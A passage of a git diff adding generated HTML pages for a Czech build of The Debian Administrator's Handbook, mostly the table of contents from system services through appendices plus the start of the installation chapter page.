+                          href="sect.syslog.html#sect.syslog-principe">9.5.1. Principle and Mechanism</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.syslog.html#sect.syslog-config">9.5.2. The Configuration File</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.inetd.html">9.6. The <code
+                        class="command">inetd</code> Super-Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.task-scheduling-cron-atd.html">9.7. Scheduling Tasks with <code
+                        class="command">cron</code> and <code
+                        class="command">atd</code></a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.task-scheduling-cron-atd.html#sect.format-crontab">9.7.1. Format of a <code
+                            class="filename">crontab</code> File</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.task-scheduling-cron-atd.html#sect.at-command">9.7.2. Using the <code
+                            class="command">at</code> Command</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.asynchronous-task-scheduling-anacron.html">9.8. Scheduling Asynchronous Tasks: <code
+                        class="command">anacron</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.quotas.html">9.9. Quotas</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.backup.html">9.10. Backup</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.backup.html#id-1.12.13.11">9.10.1. Backing Up with <code
+                            class="command">rsync</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.backup.html#id-1.12.13.12">9.10.2. Restoring Machines without Backups</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.hotplug.html">9.11. Hot Plugging: <span
+                        class="emphasis"><em>hotplug</em></span></a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.hotplug.html#id-1.12.14.2">9.11.1. Introduction</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.hotplug.html#id-1.12.14.3">9.11.2. The Naming Problem</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.hotplug.html#id-1.12.14.4">9.11.3. How <span
+                            class="emphasis"><em>udev</em></span> Works</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.hotplug.html#id-1.12.14.5">9.11.4. A concrete example</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.power-management.html">9.12. Power Management: Advanced Configuration and Power Interface (ACPI)</a></span></dt></dl></dd><dt><span
+                class="chapter"><a
+                  href="network-infrastructure.html">10. Network Infrastructure</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="network-infrastructure.html#sect.gateway">10.1. Gateway</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.virtual-private-network.html">10.2. Virtual Private Network</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.virtual-private-network.html#sect.openvpn">10.2.1. OpenVPN</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.virtual-private-network.html#sect.ssh-vpn">10.2.2. Virtual Private Network with SSH</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.virtual-private-network.html#sect.ipsec">10.2.3. IPsec</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.virtual-private-network.html#sect.pptp">10.2.4. PPTP</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.quality-of-service.html">10.3. Quality of Service</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.quality-of-service.html#sect.qos-principe">10.3.1. Principle and Mechanism</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.quality-of-service.html#sect.qos-config">10.3.2. Configuring and Implementing</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.dynamic-routing.html">10.4. Dynamic Routing</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.ipv6.html">10.5. IPv6</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.ipv6.html#sect.ipv6-tunneling">10.5.1. Tunneling</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.domain-name-servers.html">10.6. Domain Name Servers (DNS)</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.domain-name-servers.html#sect.dns-principe">10.6.1. Principle and Mechanism</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.domain-name-servers.html#sect.dns-config">10.6.2. Configuring</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.dhcp.html">10.7. DHCP</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.dhcp.html#sect.dhcp-config">10.7.1. Configuring</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.dhcp.html#sect.dhcp-dns">10.7.2. DHCP and DNS</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.network-diagnosis-tools.html">10.8. Network Diagnosis Tools</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.network-diagnosis-tools.html#sect.netstat">10.8.1. Local Diagnosis: <code
+                            class="command">netstat</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.network-diagnosis-tools.html#sect.nmap">10.8.2. Remote Diagnosis: <code
+                            class="command">nmap</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.network-diagnosis-tools.html#sect.sniffers">10.8.3. Sniffers: <code
+                            class="command">tcpdump</code> and <code
+                            class="command">wireshark</code></a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="network-services.html">11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="network-services.html#sect.smtp-mail-server">11.1. Mail Server</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="network-services.html#id-1.14.4.7">11.1.1. Installing Postfix</a></span></dt><dt><span
+                        class="section"><a
+                          href="network-services.html#sect.configuring-virtual-domains">11.1.2. Configuring Virtual Domains</a></span></dt><dt><span
+                        class="section"><a
+                          href="network-services.html#sect.restrictions-for-receiving-and-sending">11.1.3. Restrictions for Receiving and Sending</a></span></dt><dt><span
+                        class="section"><a
+                          href="network-services.html#sect.setting-up-greylisting">11.1.4. Setting Up <span
+                            class="foreignphrase"><em
+                              class="foreignphrase">greylisting</em></span></a></span></dt><dt><span
+                        class="section"><a
+                          href="network-services.html#id-1.14.4.11">11.1.5. Customizing Filters Based On the Recipient</a></span></dt><dt><span
+                        class="section"><a
+                          href="network-services.html#sect.postfix-antivirus">11.1.6. Integrating an Antivirus</a></span></dt><dt><span
+                        class="section"><a
+                          href="network-services.html#sect.authenticated-smtp">11.1.7. Authenticated SMTP</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.http-web-server.html">11.2. Web Server (HTTP)</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.http-web-server.html#id-1.14.5.9">11.2.1. Installing Apache</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.http-web-server.html#id-1.14.5.10">11.2.2. Configuring Virtual Hosts</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.http-web-server.html#id-1.14.5.11">11.2.3. Common Directives</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.http-web-server.html#id-1.14.5.12">11.2.4. Log Analyzers</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.ftp-file-server.html">11.3. FTP File Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.nfs-file-server.html">11.4. NFS File Server</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.nfs-file-server.html#id-1.14.7.10">11.4.1. Securing NFS</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.nfs-file-server.html#id-1.14.7.11">11.4.2. NFS Server</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.nfs-file-server.html#id-1.14.7.12">11.4.3. NFS Client</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.windows-file-server-with-samba.html">11.5. Setting Up Windows Shares with Samba</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.windows-file-server-with-samba.html#id-1.14.8.9">11.5.1. Samba Server</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.windows-file-server-with-samba.html#id-1.14.8.10">11.5.2. Samba Client</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.http-ftp-proxy.html">11.6. HTTP/FTP Proxy</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.http-ftp-proxy.html#id-1.14.9.8">11.6.1. Installing</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.http-ftp-proxy.html#id-1.14.9.9">11.6.2. Configuring a Cache</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.http-ftp-proxy.html#id-1.14.9.10">11.6.3. Configuring a Filter</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.ldap-directory.html">11.7. LDAP Directory</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.ldap-directory.html#id-1.14.10.7">11.7.1. Installing</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.ldap-directory.html#id-1.14.10.8">11.7.2. Filling in the Directory</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.ldap-directory.html#id-1.14.10.9">11.7.3. Managing Accounts with LDAP</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.rtc-services.html">11.8. Real-Time Communication Services</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.rtc-services.html#sect.rtc-dns-settings">11.8.1. DNS settings for RTC services</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.rtc-services.html#sect.turn-server">11.8.2. TURN Server</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.rtc-services.html#sect.sip-server">11.8.3. SIP Proxy Server</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.rtc-services.html#sect.xmpp-server">11.8.4. XMPP Server</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.rtc-services.html#sect.rtc-port-443">11.8.5. Running services on port 443</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.rtc-services.html#sect.rtc-webrtc">11.8.6. Adding WebRTC</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="advanced-administration.html">12. Advanced Administration</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="advanced-administration.html#sect.raid-and-lvm">12.1. RAID and LVM</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="advanced-administration.html#sect.raid-soft">12.1.1. Software RAID</a></span></dt><dt><span
+                        class="section"><a
+                          href="advanced-administration.html#sect.lvm">12.1.2. LVM</a></span></dt><dt><span
+                        class="section"><a
+                          href="advanced-administration.html#sect.raid-or-lvm">12.1.3. RAID or LVM?</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.virtualization.html">12.2. Virtualization</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.virtualization.html#sect.xen">12.2.1. Xen</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.virtualization.html#sect.lxc">12.2.2. LXC</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.virtualization.html#id-1.15.5.14">12.2.3. Virtualization with KVM</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.automated-installation.html">12.3. Automated Installation</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.automated-installation.html#sect.fai">12.3.1. Fully Automatic Installer (FAI)</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.automated-installation.html#sect.d-i-preseeding">12.3.2. Preseeding Debian-Installer</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.automated-installation.html#sect.simple-cdd">12.3.3. Simple-CDD: The All-In-One Solution</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.monitoring.html">12.4. Monitoring</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.monitoring.html#sect.munin">12.4.1. Setting Up Munin</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.monitoring.html#sect.nagios">12.4.2. Setting Up Nagios</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="workstation.html">13. Workstation</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="workstation.html#sect.x11-server-configuration">13.1. Configuring the X11 Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.customizing-graphical-interface.html">13.2. Customizing the Graphical Interface</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.customizing-graphical-interface.html#id-1.16.5.2">13.2.1. Choosing a Display Manager</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.customizing-graphical-interface.html#id-1.16.5.3">13.2.2. Choosing a Window Manager</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.customizing-graphical-interface.html#id-1.16.5.4">13.2.3. Menu Management</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.graphical-desktops.html">13.3. Graphical Desktops</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.graphical-desktops.html#sect.gnome-desktop">13.3.1. GNOME</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.graphical-desktops.html#id-1.16.6.13">13.3.2. KDE and Plasma</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.graphical-desktops.html#id-1.16.6.14">13.3.3. Xfce and Others</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.main-desktop-tools.html">13.4. Email</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.main-desktop-tools.html#id-1.16.7.3">13.4.1. Evolution</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.main-desktop-tools.html#id-1.16.7.4">13.4.2. KMail</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.main-desktop-tools.html#id-1.16.7.5">13.4.3. Thunderbird and Icedove</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.web-browsers.html">13.5. Web Browsers</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.development.html">13.6. Development</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.development.html#id-1.16.9.2">13.6.1. Tools for GTK+ on GNOME</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.development.html#id-1.16.9.3">13.6.2. Tools for Qt</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.collaborative-work.html">13.7. Collaborative Work</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.collaborative-work.html#id-1.16.10.3">13.7.1. Working in Groups: <span
+                            class="foreignphrase"><em
+                              class="foreignphrase">groupware</em></span></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.collaborative-work.html#id-1.16.10.4">13.7.2. Collaborative Work With FusionForge</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.office-suites.html">13.8. Office Suites</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.windows-emulation.html">13.9. Emulating Windows: Wine</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.rtc-clients.html">13.10. Real-Time Communications software</a></span></dt></dl></dd><dt><span
+                class="chapter"><a
+                  href="security.html">14. Security</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="security.html#sect.defining-security-policy">14.1. Defining a Security Policy</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.firewall-packet-filtering.html">14.2. Firewall or Packet Filtering</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.firewall-packet-filtering.html#sect.netfilter">14.2.1. Netfilter Behavior</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.firewall-packet-filtering.html#sect.iptables">14.2.2. Syntax of <code
+                            class="command">iptables</code> and <code
+                            class="command">ip6tables</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.firewall-packet-filtering.html#sect.creating-rules">14.2.3. Creating Rules</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.firewall-packet-filtering.html#sect.install-rules-at-boot">14.2.4. Installing the Rules at Each Boot</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.supervision.html">14.3. Supervision: Prevention, Detection, Deterrence</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.supervision.html#sect.logcheck">14.3.1. Monitoring Logs with <code
+                            class="command">logcheck</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.supervision.html#sect.monitoring-activity">14.3.2. Monitoring Activity</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.supervision.html#id-1.17.6.6">14.3.3. Detecting Changes</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.supervision.html#sect.intrusion-detection">14.3.4. Detecting Intrusion (IDS/NIDS)</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.apparmor.html">14.4. Introduction to AppArmor</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.apparmor.html#sect.apparmor-principles">14.4.1. Principles</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apparmor.html#sect.apparmor-setup">14.4.2. Enabling AppArmor and managing AppArmor profiles</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apparmor.html#sect.apparmor-new-profile">14.4.3. Creating a new profile</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.selinux.html">14.5. Introduction to SELinux</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.selinux.html#sect.selinux-principles">14.5.1. Principles</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.selinux.html#sect.selinux-setup">14.5.2. Setting Up SELinux</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.selinux.html#sect.selinux-management">14.5.3. Managing an SELinux System</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.selinux.html#sect.selinux-custom-rules">14.5.4. Adapting the Rules</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html">14.6. Other Security-Related Considerations</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.other-security-considerations.html#id-1.17.9.3">14.6.1. Inherent Risks of Web Applications</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.other-security-considerations.html#id-1.17.9.4">14.6.2. Knowing What To Expect</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.other-security-considerations.html#sect.choosing-the-software-wisely">14.6.3. Choosing the Software Wisely</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.other-security-considerations.html#sect.managing-a-machine-as-a-whole">14.6.4. Managing a Machine as a Whole</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.other-security-considerations.html#sect.users-are-players">14.6.5. Users Are Players</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.other-security-considerations.html#sect.physical-security">14.6.6. Physical Security</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.other-security-considerations.html#id-1.17.9.9">14.6.7. Legal Liability</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.dealing-with-compromised-machine.html">14.7. Dealing with a Compromised Machine</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.dealing-with-compromised-machine.html#id-1.17.10.3">14.7.1. Detecting and Seeing the Cracker's Intrusion</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.dealing-with-compromised-machine.html#id-1.17.10.4">14.7.2. Putting the Server Off-Line</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.dealing-with-compromised-machine.html#sect.keeping-everything-that-could-be-used-as-evidence">14.7.3. Keeping Everything that Could Be Used as Evidence</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.dealing-with-compromised-machine.html#id-1.17.10.6">14.7.4. Re-installing</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.dealing-with-compromised-machine.html#sect.forensic-analysis">14.7.5. Forensic Analysis</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.dealing-with-compromised-machine.html#sect.reconstituting-the-attack-scenario">14.7.6. Reconstituting the Attack Scenario</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="debian-packaging.html">15. Creating a Debian Package</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="debian-packaging.html#sect.rebuilding-package">15.1. Rebuilding a Package from its Sources</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="debian-packaging.html#id-1.18.4.3">15.1.1. Getting the Sources</a></span></dt><dt><span
+                        class="section"><a
+                          href="debian-packaging.html#id-1.18.4.4">15.1.2. Making Changes</a></span></dt><dt><span
+                        class="section"><a
+                          href="debian-packaging.html#id-1.18.4.5">15.1.3. Starting the Rebuild</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.building-first-package.html">15.2. Building your First Package</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.building-first-package.html#id-1.18.5.2">15.2.1. Meta-Packages or Fake Packages</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.building-first-package.html#id-1.18.5.3">15.2.2. Simple File Archive</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.setup-apt-package-repository.html">15.3. Creating a Package Repository for APT</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.becoming-package-maintainer.html">15.4. Becoming a Package Maintainer</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.becoming-package-maintainer.html#id-1.18.7.2">15.4.1. Learning to Make Packages</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.becoming-package-maintainer.html#id-1.18.7.3">15.4.2. Acceptance Process</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="conclusion.html">16. Conclusion: Debian's Future</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="conclusion.html#sect.upcoming-developments">16.1. Upcoming Developments</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.future-of-debian.html">16.2. Debian's Future</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.future-of-this-book.html">16.3. Future of this Book</a></span></dt></dl></dd><dt><span
+                class="appendix"><a
+                  href="derivative-distributions.html">A. Derivative Distributions</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="derivative-distributions.html#sect.derivative-census">A.1. Census and Cooperation</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.ubuntu.html">A.2. Ubuntu</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.linux-mint.html">A.3. Linux Mint</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.knoppix.html">A.4. Knoppix</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.aptosid.html">A.5. Aptosid and Siduction</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.grml.html">A.6. Grml</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.tails.html">A.7. Tails</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.kali.html">A.8. Kali Linux</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.devuan.html">A.9. Devuan</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.tanglu.html">A.10. Tanglu</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.doudoulinux.html">A.11. DoudouLinux</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.raspbian.html">A.12. Raspbian</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.other-derivatives.html">A.13. And Many More</a></span></dt></dl></dd><dt><span
+                class="appendix"><a
+                  href="short-remedial-course.html">B. Short Remedial Course</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="short-remedial-course.html#sect.shell-and-basic-commands">B.1. Shell and Basic Commands</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="short-remedial-course.html#id-1.21.4.5">B.1.1. Browsing the Directory Tree and Managing Files</a></span></dt><dt><span
+                        class="section"><a
+                          href="short-remedial-course.html#id-1.21.4.6">B.1.2. Displaying and Modifying Text Files</a></span></dt><dt><span
+                        class="section"><a
+                          href="short-remedial-course.html#id-1.21.4.7">B.1.3. Searching for Files and within Files</a></span></dt><dt><span
+                        class="section"><a
+                          href="short-remedial-course.html#id-1.21.4.8">B.1.4. Managing Processes</a></span></dt><dt><span
+                        class="section"><a
+                          href="short-remedial-course.html#id-1.21.4.9">B.1.5. System Information: Memory, Disk Space, Identity</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.filesystem-hierarchy.html">B.2. Organization of the Filesystem Hierarchy</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.filesystem-hierarchy.html#id-1.21.5.3">B.2.1. The Root Directory</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.filesystem-hierarchy.html#id-1.21.5.4">B.2.2. The User's Home Directory</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.computer-layers.html">B.3. Inner Workings of a Computer: the Different Layers Involved</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.computer-layers.html#sect.hardware">B.3.1. The Deepest Layer: the Hardware</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.computer-layers.html#sect.bios">B.3.2. The Starter: the BIOS or UEFI</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.computer-layers.html#sect.kernel">B.3.3. The Kernel</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.computer-layers.html#sect.userspace-presentation">B.3.4. The User Space</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.kernel-role-and-tasks.html">B.4. Some Tasks Handled by the Kernel</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.kernel-role-and-tasks.html#sect.hardware-drivers">B.4.1. Driving the Hardware</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-role-and-tasks.html#sect.filesystems">B.4.2. Filesystems</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-role-and-tasks.html#sect.shared-functions">B.4.3. Shared Functions</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-role-and-tasks.html#sect.process-management">B.4.4. Managing Processes</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-role-and-tasks.html#sect.permissions">B.4.5. Rights Management</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.user-space.html">B.5. The User Space</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.user-space.html#sect.process-basics">B.5.1. Process</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.user-space.html#sect.daemons">B.5.2. Daemons</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.user-space.html#sect.ipc">B.5.3. Inter-Process Communications</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.user-space.html#sect.libraries">B.5.4. Libraries</a></span></dt></dl></dd></dl></dd><dt><span
+                class="appendix"><a
+                  href="backcover.html">C. The Debian Administrator's Handbook</a></span></dt><dt><span
+                class="appendix"><a
+                  href="website.html">D. Get the book</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="website.html#sect.buy-the-paperback">D.1. Buy the English Paperback</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.download-the-electronic-version.html">D.2. Download the electronic version</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.download-the-book.html">D.3. Download the book</a></span></dt></dl></dd></dl></div></div><ul
+        class="docnav"><li
+          class="previous"></li><li
+          class="next"><a
+            accesskey="n"
+            href="preface.html"><strong>Další</strong>Úvodní slovo</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/installation.html b/publish/cs-CZ/Debian/9/html/debian-handbook/installation.html
new file mode 100644
index 000000000..dbe54e1d4
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/installation.html
@@ -0,0 +1,316 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 4. Installation</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Installation, Partitioning, Formatting, File System, Boot Sector, Hardware Detection" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.how-to-migrate.html"
+        title="3.2. How To Migrate" /><link
+        rel="next"
+        href="sect.installation-steps.html"
+        title="4.2. Installing, Step by Step" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/installation.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.how-to-migrate.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.installation-steps.html"><strong>Další</strong></a></li></ul><div
